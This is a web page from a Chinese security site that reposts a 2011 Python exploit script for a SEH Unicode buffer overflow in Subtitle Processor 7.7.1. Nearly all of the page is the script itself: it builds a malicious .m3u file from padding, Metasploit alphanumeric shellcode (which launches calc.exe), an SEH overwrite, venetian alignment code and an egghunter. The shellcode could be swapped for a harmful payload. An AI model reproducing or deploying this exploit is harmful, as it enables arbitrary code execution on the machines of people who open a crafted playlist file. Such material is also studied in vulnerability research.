首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit
来源:Fallow: @MK1234Tfan 作者:Brandon 发布时间:2011-04-28  

#!/usr/bin/python
# I wanted to first of all thank all the people who took the time to help me.
# Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me!
# Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques!
# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow
# Download: http://sourceforge.net/projects/subtitleproc/
# Version 7.7.1
# Author: Brandon Murphy
# Tested on Windows XP Pro SP3
# Author notified of vulnerability by email 12/11/2010
# No reply from author: Released exploit to public 4/26/2011

print "#=========================================================#"
print "#  Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow   #"
print "# Vulnerability found & exploit written by Brandon Murphy #"
print "#                Fallow: @MK1234Tfan                      #"
print "#=========================================================#"

junk = "\x41" * 70
tag = "s1cks1ck"

# msfpayload windows/exec CMD=calc.exe 496
shellcode = ("\x89\xe5\xdd\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x43\x30"
"\x45\x50\x45\x50\x45\x30\x4b\x39\x5a\x45\x50\x31\x58\x52\x43"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x51\x42\x52\x34\x4c\x4b\x54\x32\x56\x48\x54\x4f\x4e\x57\x51"
"\x5a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x45\x52\x56\x4c\x51\x30\x49\x51\x58\x4f\x54"
"\x4d\x43\x31\x58\x47\x4b\x52\x5a\x50\x56\x32\x50\x57\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x43\x48\x4c\x45\x4f\x30\x43\x44\x51\x5a\x43\x31"
"\x58\x50\x50\x50\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
"\x50\x45\x51\x49\x43\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x50\x34"
"\x4c\x4b\x45\x51\x49\x46\x56\x51\x4b\x4f\x50\x31\x49\x50\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x49\x57\x50\x38\x4b\x50"
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56"
"\x44\x54\x35\x5a\x42\x51\x48\x4c\x4b\x50\x58\x51\x34\x45\x51"
"\x58\x53\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45"
"\x4c\x43\x31\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x4e\x30"
"\x4b\x39\x51\x54\x47\x54\x51\x34\x51\x4b\x51\x4b\x43\x51\x50"
"\x59\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a"
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c"
"\x4d\x4d\x55\x4f\x49\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58"
"\x50\x31\x4c\x4b\x52\x4f\x4b\x37\x4b\x4f\x4e\x35\x4f\x4b\x5a"
"\x50\x4e\x55\x4f\x52\x50\x56\x43\x58\x49\x36\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x54\x4a\x4d"
"\x50\x4b\x4b\x4b\x50\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53"
"\x54\x32\x52\x4f\x43\x5a\x43\x30\x51\x43\x4b\x4f\x49\x45\x52"
"\x43\x43\x51\x52\x4c\x45\x33\x56\x4e\x52\x45\x52\x58\x45\x35"
"\x43\x30\x41\x41")

junk2 = "\x41" * 3531
nseh = "\x61\x62"

# ppr 005700b4 Subtitleprocessor.exe
seh = "\xb4\x57"

# Venetian
# Align:
# add byte ptr [esi],ch - \x6e
# pop ebp -               \x55
# add byte ptr [esi],ch - \x6e
# pop eax -               \x58
# add byte ptr [esi],ch - \x6e
# add eax,0x11001400 -    \x05\x14\x11
# add byte ptr [esi],ch - \x6e
# sub eax,0x11001300 -    \x2d\x13\x11
# add byte ptr [esi],ch - \x6e
#
# Jump:
# push eax - \x50
# add byte ptr [esi],ch - \x6e
# ret - \xc3

align = "\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e"
jmp = "\x50\x6e\xc3"
junk3 = "\x44" * 108
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58A"
"APAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO0B0R1ZKR0X8MNNOLKU0Z2TJO6X2S011S2K4KJZ6O2U9Z6O2U9WKO9WKPA")

payload = junk + tag + shellcode + junk2 + nseh + seh + align + jmp + junk3 + egghunter
try:
    make = open("exploit.m3u",'w')
    make.write(payload)
    make.close()
    print "[+] Go Go Gadget SEH unicode!"
except:
    print "[-] Something went wrong...</3"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EMC HomeBase Server Directory
·libmodplug <= 0.8.8.2 .abc Sta
·NetOp Remote Control 8.0, 9.1,
·WordPress SermonBrowser Plugin
·OSX/Intel reverse_tcp shell x8
·Subtitle Processor 7.7.1 .M3U
·Maxthon Browser 3.22.2000 Deni
·Microsoft Office Excel Axis Pr
·RealPlayer 11 Browser Active-X
·MJM Core Player 2011 .s3m Stac
·eXPert PDF Editor 7 Profession
·MJM QuickPlayer 1.00 beta 60a
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved